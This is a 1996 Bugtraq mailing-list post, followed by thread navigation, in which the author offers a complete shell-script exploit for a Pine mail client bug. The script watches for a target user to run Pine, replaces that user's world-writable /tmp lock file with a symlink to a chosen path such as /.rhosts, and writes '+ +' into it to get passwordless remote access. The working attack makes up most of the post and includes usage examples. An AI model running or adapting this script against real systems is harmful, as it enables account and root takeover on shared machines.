Bugtraq mailing list archives
A Stupid script.
From: e-torres () uniandes edu co (Efrain Torres)
Date: Sat, 23 Nov 1996 10:36:57 +0500
H0l4, Well here is a stupid script to exploit the pine bug, is better than to have to exploit it manually. It just sucks waiting for the user to quit and re-enter pine. Why is a shell script and not a C program?.. simple because some root dont allow the execution of cc, gcc (its a security problem .. duhhhhhhh.... ). So be happy whatever you do. Greetings from Colombia, E.T Lownoise e-torres () uniandes edu co ------------------------------------------------------------------------ ^^ Funny Shit to know, some people like to spread ignorance to control the information, just to be the only ones. yeah in this country too. L0wnoise Just trying to change this shit. ^^ ________________________________________________________________________ ---------------------- Cortame por aca ----QUE SI! POR ACA ------------- #!/bin/sh # # ET Lownoise 1996 Colombia # pine bug exploit # # usage: pine.sh username path/file_to_create & # ex: pine.sh root /.rhosts & # ex2: pine.sh root /.rhosts > out & (and go to sleep). # # version 3.91, 3.92 ..... # version 3.95 fixed # # Note: must do some changes in the script. look 4 CHANGE THIS: # # Yea i know is a lame script but is better than nothing.. # try to exploit the bug without a script and you will wait # forever. # e-torres () uniandes edu co # argumentos=0 if [ $# -eq $argumentos ] then echo "Usage: $0 username path/file_to_create & " echo "ET Lownoise 1996 Colombia" exit fi username=$1 archivo=$2 #CHANGE THIS: #text='text to puit in file to create' #usr=path of the program users #pineprog=how the pine program appears when u do a w (who) command text='+ +' usr=users pineprog=pine # date echo "- Looking for $1 to log in... just wait" # entrada=0 entro=0 until [ $entro -eq $entrada ] do for nombre in `$usr` do if [ $nombre = $1 ] then entro=1 fi done done date echo "- Ok $username is logged now." # echo "- Lets wait that $1 run pine. " noejecuto=0 ejecuto=0 until [ $ejecuto -ne $noejecuto ] do for ejecutando in `w $username` do if [ $ejecutando = $pineprog ] then date echo '- OK ' $1 ' is running ' $pineprog '.' ejecuto=1 fi done done echo "- Now lets grab the lock file of $username from /tmp" ls -al /tmp | grep $username > temp1 cat temp1 | grep rw-rw-rw- > temporal lockfile=`awk '{print $9}' temporal` rm temp1 rm temporal echo "> Username $username" echo "> Lockfile $lockfile" echo echo "- OK now im going to wait that $username " echo " quits $pineprog " # do it till exist lockfile, that means username havent quit pine cd /tmp while [ -s $lockfile ] do sleep 0 done cd date echo "- OK $username quit $pineprog .. now to link $lockfile " #$archivo is the complete path of file in username cd /tmp ln -s $archivo $lockfile echo "- $lockfile is now linked " cd echo "- $username must now return to pine to create" echo " $archivo " echo "- Waiting $username to return pine " noejecuto=0 ejecuto=0 until [ $ejecuto -ne $noejecuto ] do for ejecutando in `w $username ` do if [ $ejecutando = $pineprog ] then date echo '- OK ' $username ' is running ' $pineprog ejecuto=1 fi done done echo "- Introducing text..." cd /tmp echo $text > $lockfile echo "- Erasing $lockfile " rm $lockfile cd echo "THE END DUDE!" echo "ET Lownoise 1996 "
Current thread:
- Re: ALERT: Solaris 2.5.1 locks up on TCP connections in Pine 3.9x, (continued)
- Re: ALERT: Solaris 2.5.1 locks up on TCP connections in Pine 3.9x Brian Harvell (Nov 20)
- ssh w/ solaris 2.5.[1] Aleph One (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Mike Battersby (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Casper Dik (Nov 19)
- Futile rexecd holes jaeger (Nov 18)
- Re: Futile rexecd holes Roger Espel Llima (Nov 19)
- Irix: new LicenseManager is safe? No way Yuri Volobuev (Nov 22)
- Re: Futile rexecd holes Jon Peatfield (Nov 22)
- Administratrivia Aleph One (Nov 22)
- Administratrivia Scriptors of DOOM (Nov 23)
- A Stupid script. Efrain Torres (Nov 22)
- A Stupid script. Aleph One (Nov 24)
- AIX lquerypv Aleph One (Nov 25)
- lquerypv fix Troy Bollinger (Nov 25)
- Security Problems in XMCD David J. Meltzer (Nov 25)
- FreeBSD Security Advisory: FreeBSD-SA-96:18.lpr FreeBSD Security Officer (Nov 25)
- Digital FW2.0 question Peter Dieth (Nov 26)
- Re: Digital FW2.0 question Alan Cox (Nov 27)
- Re: FreeBSD Security Advisory: FreeBSD-SA-96:18.lpr Warner Losh (Nov 26)
- XMCD v2.1 released (was: Security Problems in XMCD) Xmcd Admin (Nov 25)
- Security Problems in XMCD 2.1 David J. Meltzer (Nov 26)